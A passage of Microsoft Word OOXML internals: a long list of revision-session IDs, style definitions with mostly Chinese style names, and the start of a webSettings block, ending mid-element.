    <w:rsid w:val="005862DD"/>
    <w:rsid w:val="00587D1A"/>
    <w:rsid w:val="005908A8"/>
    <w:rsid w:val="0059412C"/>
    <w:rsid w:val="005A10FE"/>
    <w:rsid w:val="005A252B"/>
    <w:rsid w:val="005A3566"/>
    <w:rsid w:val="005B0371"/>
    <w:rsid w:val="005B24C5"/>
    <w:rsid w:val="005B2A83"/>
    <w:rsid w:val="005B450D"/>
    <w:rsid w:val="005B4A40"/>
    <w:rsid w:val="005B610A"/>
    <w:rsid w:val="005B620B"/>
    <w:rsid w:val="005C110B"/>
    <w:rsid w:val="005C5143"/>
    <w:rsid w:val="005C7224"/>
    <w:rsid w:val="005C75E9"/>
    <w:rsid w:val="005D6BF7"/>
    <w:rsid w:val="005E040A"/>
    <w:rsid w:val="005E5618"/>
    <w:rsid w:val="005E6571"/>
    <w:rsid w:val="005F1C71"/>
    <w:rsid w:val="005F4A97"/>
    <w:rsid w:val="005F5A89"/>
    <w:rsid w:val="0060288C"/>
    <w:rsid w:val="0061021C"/>
    <w:rsid w:val="00612114"/>
    <w:rsid w:val="006248DE"/>
    <w:rsid w:val="00632B1D"/>
    <w:rsid w:val="0064399B"/>
    <w:rsid w:val="00655172"/>
    <w:rsid w:val="00661F0C"/>
    <w:rsid w:val="006630B9"/>
    <w:rsid w:val="00664916"/>
    <w:rsid w:val="00664E9E"/>
    <w:rsid w:val="00665F94"/>
    <w:rsid w:val="00666083"/>
    <w:rsid w:val="00670E3A"/>
    <w:rsid w:val="0067698D"/>
    <w:rsid w:val="00680B35"/>
    <w:rsid w:val="00680BC1"/>
    <w:rsid w:val="006855DC"/>
    <w:rsid w:val="00691EE2"/>
    <w:rsid w:val="00695F16"/>
    <w:rsid w:val="006A0FFD"/>
    <w:rsid w:val="006A7364"/>
    <w:rsid w:val="006B7D8F"/>
    <w:rsid w:val="006C0CB4"/>
    <w:rsid w:val="006D12F9"/>
    <w:rsid w:val="006D5184"/>
    <w:rsid w:val="006E38AD"/>
    <w:rsid w:val="006F144E"/>
    <w:rsid w:val="006F2B23"/>
    <w:rsid w:val="006F4708"/>
    <w:rsid w:val="00700DC0"/>
    <w:rsid w:val="00701B63"/>
    <w:rsid w:val="007101B2"/>
    <w:rsid w:val="007111A6"/>
    <w:rsid w:val="007114B3"/>
    <w:rsid w:val="007133C6"/>
    <w:rsid w:val="007168E2"/>
    <w:rsid w:val="00721CB7"/>
    <w:rsid w:val="00722EFC"/>
    <w:rsid w:val="00725C98"/>
    <w:rsid w:val="00726A71"/>
    <w:rsid w:val="007275DE"/>
    <w:rsid w:val="007334DB"/>
    <w:rsid w:val="00736486"/>
    <w:rsid w:val="00737E10"/>
    <w:rsid w:val="0074004F"/>
    <w:rsid w:val="00745284"/>
    <w:rsid w:val="007459EB"/>
    <w:rsid w:val="00746EC2"/>
    <w:rsid w:val="00747755"/>
    <w:rsid w:val="00752B40"/>
    <w:rsid w:val="00752FAF"/>
    <w:rsid w:val="00757005"/>
    <w:rsid w:val="007616E5"/>
    <w:rsid w:val="00763861"/>
    <w:rsid w:val="0076441D"/>
    <w:rsid w:val="00767AFA"/>
    <w:rsid w:val="0077032F"/>
    <w:rsid w:val="00772A02"/>
    <w:rsid w:val="00775E21"/>
    <w:rsid w:val="00781499"/>
    <w:rsid w:val="00783AEE"/>
    <w:rsid w:val="00784A89"/>
    <w:rsid w:val="00785E70"/>
    <w:rsid w:val="00790711"/>
    <w:rsid w:val="00791224"/>
    <w:rsid w:val="0079171F"/>
    <w:rsid w:val="00791732"/>
    <w:rsid w:val="00794907"/>
    <w:rsid w:val="007960B6"/>
    <w:rsid w:val="007A2500"/>
    <w:rsid w:val="007A4406"/>
    <w:rsid w:val="007B4265"/>
    <w:rsid w:val="007C0E47"/>
    <w:rsid w:val="007D76F2"/>
    <w:rsid w:val="007E116E"/>
    <w:rsid w:val="007E27D4"/>
    <w:rsid w:val="007E62CF"/>
    <w:rsid w:val="00801F38"/>
    <w:rsid w:val="00803191"/>
    <w:rsid w:val="00806C73"/>
    <w:rsid w:val="00810806"/>
    <w:rsid w:val="0081171F"/>
    <w:rsid w:val="00813C98"/>
    <w:rsid w:val="00814D75"/>
    <w:rsid w:val="00832FF4"/>
    <w:rsid w:val="00847D70"/>
    <w:rsid w:val="008644B7"/>
    <w:rsid w:val="008668E0"/>
    <w:rsid w:val="00866B46"/>
    <w:rsid w:val="00866B65"/>
    <w:rsid w:val="00873EFC"/>
    <w:rsid w:val="00875BEE"/>
    <w:rsid w:val="00875E80"/>
    <w:rsid w:val="008762BD"/>
    <w:rsid w:val="0088109A"/>
    <w:rsid w:val="0088242E"/>
    <w:rsid w:val="00883E3F"/>
    <w:rsid w:val="00887C52"/>
    <w:rsid w:val="008970A5"/>
    <w:rsid w:val="008A614A"/>
    <w:rsid w:val="008B3A35"/>
    <w:rsid w:val="008B3B52"/>
    <w:rsid w:val="008B73ED"/>
    <w:rsid w:val="008C089C"/>
    <w:rsid w:val="008C08EF"/>
    <w:rsid w:val="008C42FE"/>
    <w:rsid w:val="008C7B4E"/>
    <w:rsid w:val="008D0A00"/>
    <w:rsid w:val="008D187A"/>
    <w:rsid w:val="008D465C"/>
    <w:rsid w:val="008D5CD6"/>
    <w:rsid w:val="008D6779"/>
    <w:rsid w:val="008E3A05"/>
    <w:rsid w:val="008E7E54"/>
    <w:rsid w:val="008F0C33"/>
    <w:rsid w:val="008F6980"/>
    <w:rsid w:val="009036BB"/>
    <w:rsid w:val="00910745"/>
    <w:rsid w:val="00912D99"/>
    <w:rsid w:val="00913260"/>
    <w:rsid w:val="00917738"/>
    <w:rsid w:val="0092666C"/>
    <w:rsid w:val="009327B9"/>
    <w:rsid w:val="009427BF"/>
    <w:rsid w:val="00943CA4"/>
    <w:rsid w:val="00951C2C"/>
    <w:rsid w:val="00954CA1"/>
    <w:rsid w:val="00957D2B"/>
    <w:rsid w:val="00961D7F"/>
    <w:rsid w:val="0096355D"/>
    <w:rsid w:val="00964474"/>
    <w:rsid w:val="0096450A"/>
    <w:rsid w:val="009705AE"/>
    <w:rsid w:val="00971064"/>
    <w:rsid w:val="00976F53"/>
    <w:rsid w:val="00982343"/>
    <w:rsid w:val="009853A1"/>
    <w:rsid w:val="009875DE"/>
    <w:rsid w:val="009943CA"/>
    <w:rsid w:val="0099647A"/>
    <w:rsid w:val="009A0CBC"/>
    <w:rsid w:val="009A3127"/>
    <w:rsid w:val="009A63D2"/>
    <w:rsid w:val="009A6549"/>
    <w:rsid w:val="009B1128"/>
    <w:rsid w:val="009C2513"/>
    <w:rsid w:val="009C5641"/>
    <w:rsid w:val="009C61CD"/>
    <w:rsid w:val="009C668B"/>
    <w:rsid w:val="009C7000"/>
    <w:rsid w:val="009D259E"/>
    <w:rsid w:val="009E71C7"/>
    <w:rsid w:val="009F2511"/>
    <w:rsid w:val="00A03B1C"/>
    <w:rsid w:val="00A04145"/>
    <w:rsid w:val="00A06199"/>
    <w:rsid w:val="00A06782"/>
    <w:rsid w:val="00A10490"/>
    <w:rsid w:val="00A10DD8"/>
    <w:rsid w:val="00A11DA1"/>
    <w:rsid w:val="00A11F7E"/>
    <w:rsid w:val="00A1390E"/>
    <w:rsid w:val="00A17887"/>
    <w:rsid w:val="00A21380"/>
    <w:rsid w:val="00A216A5"/>
    <w:rsid w:val="00A27868"/>
    <w:rsid w:val="00A3321A"/>
    <w:rsid w:val="00A3398E"/>
    <w:rsid w:val="00A33FDE"/>
    <w:rsid w:val="00A4042C"/>
    <w:rsid w:val="00A44199"/>
    <w:rsid w:val="00A4601C"/>
    <w:rsid w:val="00A53FA9"/>
    <w:rsid w:val="00A572A2"/>
    <w:rsid w:val="00A6023E"/>
    <w:rsid w:val="00A61CB3"/>
    <w:rsid w:val="00A6239B"/>
    <w:rsid w:val="00A630D7"/>
    <w:rsid w:val="00A64612"/>
    <w:rsid w:val="00A70D8B"/>
    <w:rsid w:val="00A736E7"/>
    <w:rsid w:val="00A73764"/>
    <w:rsid w:val="00A7531F"/>
    <w:rsid w:val="00A767AA"/>
    <w:rsid w:val="00A80737"/>
    <w:rsid w:val="00A81286"/>
    <w:rsid w:val="00A81764"/>
    <w:rsid w:val="00A84480"/>
    <w:rsid w:val="00A870ED"/>
    <w:rsid w:val="00A93CD0"/>
    <w:rsid w:val="00A950EB"/>
    <w:rsid w:val="00AA077F"/>
    <w:rsid w:val="00AA21A9"/>
    <w:rsid w:val="00AA38A6"/>
    <w:rsid w:val="00AA698A"/>
    <w:rsid w:val="00AB20D4"/>
    <w:rsid w:val="00AB37D4"/>
    <w:rsid w:val="00AC4073"/>
    <w:rsid w:val="00AC4766"/>
    <w:rsid w:val="00AC67E1"/>
    <w:rsid w:val="00AC6C5A"/>
    <w:rsid w:val="00AC6FDA"/>
    <w:rsid w:val="00AD199B"/>
    <w:rsid w:val="00AD5612"/>
    <w:rsid w:val="00AD6BE8"/>
    <w:rsid w:val="00AE173D"/>
    <w:rsid w:val="00AF04E0"/>
    <w:rsid w:val="00AF30DE"/>
    <w:rsid w:val="00AF4C4A"/>
    <w:rsid w:val="00AF6211"/>
    <w:rsid w:val="00B00C06"/>
    <w:rsid w:val="00B031B5"/>
    <w:rsid w:val="00B04555"/>
    <w:rsid w:val="00B101F8"/>
    <w:rsid w:val="00B12E7A"/>
    <w:rsid w:val="00B25432"/>
    <w:rsid w:val="00B33CFC"/>
    <w:rsid w:val="00B343A9"/>
    <w:rsid w:val="00B35DDC"/>
    <w:rsid w:val="00B36606"/>
    <w:rsid w:val="00B45E4D"/>
    <w:rsid w:val="00B56252"/>
    <w:rsid w:val="00B714EC"/>
    <w:rsid w:val="00B73CF6"/>
    <w:rsid w:val="00B779EE"/>
    <w:rsid w:val="00B82846"/>
    <w:rsid w:val="00B83215"/>
    <w:rsid w:val="00B858CD"/>
    <w:rsid w:val="00B90645"/>
    <w:rsid w:val="00B9133B"/>
    <w:rsid w:val="00B92C26"/>
    <w:rsid w:val="00B950E2"/>
    <w:rsid w:val="00B956E8"/>
    <w:rsid w:val="00B96006"/>
    <w:rsid w:val="00B9667E"/>
    <w:rsid w:val="00BA07C9"/>
    <w:rsid w:val="00BA47BA"/>
    <w:rsid w:val="00BB1E97"/>
    <w:rsid w:val="00BB3738"/>
    <w:rsid w:val="00BB6F4B"/>
    <w:rsid w:val="00BC1101"/>
    <w:rsid w:val="00BC3F36"/>
    <w:rsid w:val="00BC61A7"/>
    <w:rsid w:val="00BD4357"/>
    <w:rsid w:val="00BD5A5E"/>
    <w:rsid w:val="00BD67FE"/>
    <w:rsid w:val="00BD6A33"/>
    <w:rsid w:val="00BE6851"/>
    <w:rsid w:val="00BE78E8"/>
    <w:rsid w:val="00BF2986"/>
    <w:rsid w:val="00BF3DC1"/>
    <w:rsid w:val="00BF41D7"/>
    <w:rsid w:val="00BF479C"/>
    <w:rsid w:val="00C0046C"/>
    <w:rsid w:val="00C00E88"/>
    <w:rsid w:val="00C056F4"/>
    <w:rsid w:val="00C060B3"/>
    <w:rsid w:val="00C142B0"/>
    <w:rsid w:val="00C148E2"/>
    <w:rsid w:val="00C30156"/>
    <w:rsid w:val="00C318F7"/>
    <w:rsid w:val="00C34ACF"/>
    <w:rsid w:val="00C351EF"/>
    <w:rsid w:val="00C421D3"/>
    <w:rsid w:val="00C47554"/>
    <w:rsid w:val="00C555E5"/>
    <w:rsid w:val="00C55B59"/>
    <w:rsid w:val="00C56697"/>
    <w:rsid w:val="00C6391F"/>
    <w:rsid w:val="00C64056"/>
    <w:rsid w:val="00C64BAD"/>
    <w:rsid w:val="00C64CDA"/>
    <w:rsid w:val="00C66CA3"/>
    <w:rsid w:val="00C70CB3"/>
    <w:rsid w:val="00C81FE5"/>
    <w:rsid w:val="00C82B52"/>
    <w:rsid w:val="00C86570"/>
    <w:rsid w:val="00C878D7"/>
    <w:rsid w:val="00C90D92"/>
    <w:rsid w:val="00C9116A"/>
    <w:rsid w:val="00C91246"/>
    <w:rsid w:val="00CA300C"/>
    <w:rsid w:val="00CA477F"/>
    <w:rsid w:val="00CB0C02"/>
    <w:rsid w:val="00CB28C0"/>
    <w:rsid w:val="00CC53A0"/>
    <w:rsid w:val="00CD002C"/>
    <w:rsid w:val="00CD2E19"/>
    <w:rsid w:val="00CD3B61"/>
    <w:rsid w:val="00CD5615"/>
    <w:rsid w:val="00CD58AB"/>
    <w:rsid w:val="00CE520D"/>
    <w:rsid w:val="00CE7DFE"/>
    <w:rsid w:val="00CF0DE1"/>
    <w:rsid w:val="00CF74BE"/>
    <w:rsid w:val="00D01874"/>
    <w:rsid w:val="00D041AF"/>
    <w:rsid w:val="00D11032"/>
    <w:rsid w:val="00D13624"/>
    <w:rsid w:val="00D16EA3"/>
    <w:rsid w:val="00D17F34"/>
    <w:rsid w:val="00D2062A"/>
    <w:rsid w:val="00D22BCE"/>
    <w:rsid w:val="00D27513"/>
    <w:rsid w:val="00D30AA9"/>
    <w:rsid w:val="00D407AA"/>
    <w:rsid w:val="00D422CB"/>
    <w:rsid w:val="00D439F2"/>
    <w:rsid w:val="00D441D5"/>
    <w:rsid w:val="00D4483F"/>
    <w:rsid w:val="00D46EFD"/>
    <w:rsid w:val="00D5392A"/>
    <w:rsid w:val="00D557DA"/>
    <w:rsid w:val="00D57029"/>
    <w:rsid w:val="00D62024"/>
    <w:rsid w:val="00D63C4F"/>
    <w:rsid w:val="00D6406D"/>
    <w:rsid w:val="00D70560"/>
    <w:rsid w:val="00D71415"/>
    <w:rsid w:val="00D73617"/>
    <w:rsid w:val="00D7457F"/>
    <w:rsid w:val="00D74DF8"/>
    <w:rsid w:val="00D74E10"/>
    <w:rsid w:val="00D750A2"/>
    <w:rsid w:val="00D75550"/>
    <w:rsid w:val="00D82009"/>
    <w:rsid w:val="00D84D26"/>
    <w:rsid w:val="00D84D39"/>
    <w:rsid w:val="00D87393"/>
    <w:rsid w:val="00D87504"/>
    <w:rsid w:val="00D95E79"/>
    <w:rsid w:val="00DA2EA6"/>
    <w:rsid w:val="00DA3FCF"/>
    <w:rsid w:val="00DB0C8D"/>
    <w:rsid w:val="00DB1AB8"/>
    <w:rsid w:val="00DB2AAC"/>
    <w:rsid w:val="00DC0672"/>
    <w:rsid w:val="00DC1EB4"/>
    <w:rsid w:val="00DC35A1"/>
    <w:rsid w:val="00DD6217"/>
    <w:rsid w:val="00DE1EB8"/>
    <w:rsid w:val="00DF216C"/>
    <w:rsid w:val="00DF478A"/>
    <w:rsid w:val="00DF7231"/>
    <w:rsid w:val="00E00B92"/>
    <w:rsid w:val="00E04334"/>
    <w:rsid w:val="00E04B1E"/>
    <w:rsid w:val="00E14DFA"/>
    <w:rsid w:val="00E157C6"/>
    <w:rsid w:val="00E178D1"/>
    <w:rsid w:val="00E20347"/>
    <w:rsid w:val="00E22CE4"/>
    <w:rsid w:val="00E240B2"/>
    <w:rsid w:val="00E3045E"/>
    <w:rsid w:val="00E31127"/>
    <w:rsid w:val="00E33209"/>
    <w:rsid w:val="00E427FF"/>
    <w:rsid w:val="00E428A6"/>
    <w:rsid w:val="00E4536B"/>
    <w:rsid w:val="00E56002"/>
    <w:rsid w:val="00E648F5"/>
    <w:rsid w:val="00E64C56"/>
    <w:rsid w:val="00E77387"/>
    <w:rsid w:val="00E77D03"/>
    <w:rsid w:val="00E8363B"/>
    <w:rsid w:val="00E846C9"/>
    <w:rsid w:val="00E86AA4"/>
    <w:rsid w:val="00E91127"/>
    <w:rsid w:val="00E9198D"/>
    <w:rsid w:val="00E94353"/>
    <w:rsid w:val="00E95AEF"/>
    <w:rsid w:val="00E97805"/>
    <w:rsid w:val="00E97868"/>
    <w:rsid w:val="00EA60FC"/>
    <w:rsid w:val="00EB0E4C"/>
    <w:rsid w:val="00EB142C"/>
    <w:rsid w:val="00EB3D78"/>
    <w:rsid w:val="00EC243A"/>
    <w:rsid w:val="00EC3AB8"/>
    <w:rsid w:val="00EC4E12"/>
    <w:rsid w:val="00ED2573"/>
    <w:rsid w:val="00ED2962"/>
    <w:rsid w:val="00EE1310"/>
    <w:rsid w:val="00EE14D2"/>
    <w:rsid w:val="00EE38D1"/>
    <w:rsid w:val="00EF15F5"/>
    <w:rsid w:val="00EF331F"/>
    <w:rsid w:val="00EF3DBC"/>
    <w:rsid w:val="00F065B7"/>
    <w:rsid w:val="00F0660F"/>
    <w:rsid w:val="00F06C68"/>
    <w:rsid w:val="00F15059"/>
    <w:rsid w:val="00F2119A"/>
    <w:rsid w:val="00F21F8E"/>
    <w:rsid w:val="00F32720"/>
    <w:rsid w:val="00F402CA"/>
    <w:rsid w:val="00F501DE"/>
    <w:rsid w:val="00F541A2"/>
    <w:rsid w:val="00F55B2C"/>
    <w:rsid w:val="00F5672F"/>
    <w:rsid w:val="00F56BFB"/>
    <w:rsid w:val="00F56D3C"/>
    <w:rsid w:val="00F57EBB"/>
    <w:rsid w:val="00F72CF9"/>
    <w:rsid w:val="00F7495E"/>
    <w:rsid w:val="00F75C30"/>
    <w:rsid w:val="00F775BD"/>
    <w:rsid w:val="00F81D48"/>
    <w:rsid w:val="00F8404F"/>
    <w:rsid w:val="00F8580E"/>
    <w:rsid w:val="00F85E07"/>
    <w:rsid w:val="00F9073F"/>
    <w:rsid w:val="00FA7E5F"/>
    <w:rsid w:val="00FB177D"/>
    <w:rsid w:val="00FB6050"/>
    <w:rsid w:val="00FB6C3D"/>
    <w:rsid w:val="00FC0859"/>
    <w:rsid w:val="00FC10AF"/>
    <w:rsid w:val="00FC5AFC"/>
    <w:rsid w:val="00FC69BB"/>
    <w:rsid w:val="00FD77BA"/>
    <w:rsid w:val="00FE3378"/>
    <w:rsid w:val="00FE4F96"/>
    <w:rsid w:val="00FF17CD"/>
    <w:rsid w:val="00FF73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21104"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:next w:val="2"/>
    <w:qFormat/>
    <w:rsid w:val="0054253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54253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542539"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="35"/>
      </w:numPr>
      <w:spacing w:before="260" w:after="260" w:line="416" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>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54253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542539"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="decimal" w:pos="0"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:noProof/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a6">
    <w:name w:val="表头文本"/>
    <w:rsid w:val="00542539"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a7">
    <w:name w:val="表样式"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00542539"/>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54253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542539"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl/>
      <w:spacing w:before="80" w:after="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a9">
    <w:name w:val="文档标题"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00542539"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="0"/>
      </w:tabs>
      <w:spacing w:before="300" w:after="300"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="footer"/>
    <w:rsid w:val="00542539"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4510"/>
        <w:tab w:val="right" w:pos="9020"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="header"/>
    <w:rsid w:val="0054253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542539"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ad">
    <w:name w:val="注示头"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00542539"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="000000"/>
      </w:pBdr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ae">
    <w:name w:val="注示文本"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00542539"/>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542539"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:i/>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="0054253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542539"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="样式二"/>
    <w:basedOn w:val="af1"/>
    <w:rsid w:val="00542539"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="Char"/>
    <w:rsid w:val="00542539"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af3"/>
    <w:rsid w:val="00542539"/>
    <w:rPr>
      <w:snapToGrid w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="Char0"/>
    <w:rsid w:val="00021104"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af4"/>
    <w:rsid w:val="00021104"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:snapToGrid w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00021104"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="af6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="009A63D2"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C6391F"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00CF74BE"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af9">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="Char1"/>
    <w:rsid w:val="00CF74BE"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注文字 Char"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="af9"/>
    <w:rsid w:val="00CF74BE"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afa">
    <w:name w:val="表头样式"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="002E2679"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="0"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afb">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="af9"/>
    <w:next w:val="af9"/>
    <w:link w:val="Char2"/>
    <w:rsid w:val="004B49E1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="批注主题 Char"/>
    <w:basedOn w:val="Char1"/>
    <w:link w:val="afb"/>
    <w:rsid w:val="004B49E1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="im-content1">
    <w:name w:val="im-content1"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="0016660F"/>
    <w:rPr>
      <w:color w:val="333333"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0015392B"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="r1">
    <w:name w:val="r1"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="0015392B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="7F0055"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="q1">
    <w:name w:val="q1"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="0015392B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2A00FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afc">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00E31127"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="im-content2">
    <w:name w:val="im-content2"/>
    <w:basedOn w:val="a2"/>
    <w:rsid w:val="00352A00"/>
    <w:rPr>
      <w:color w:val="333333"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=word/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:divs>
    <w:div w:id="386805559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1643581538">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
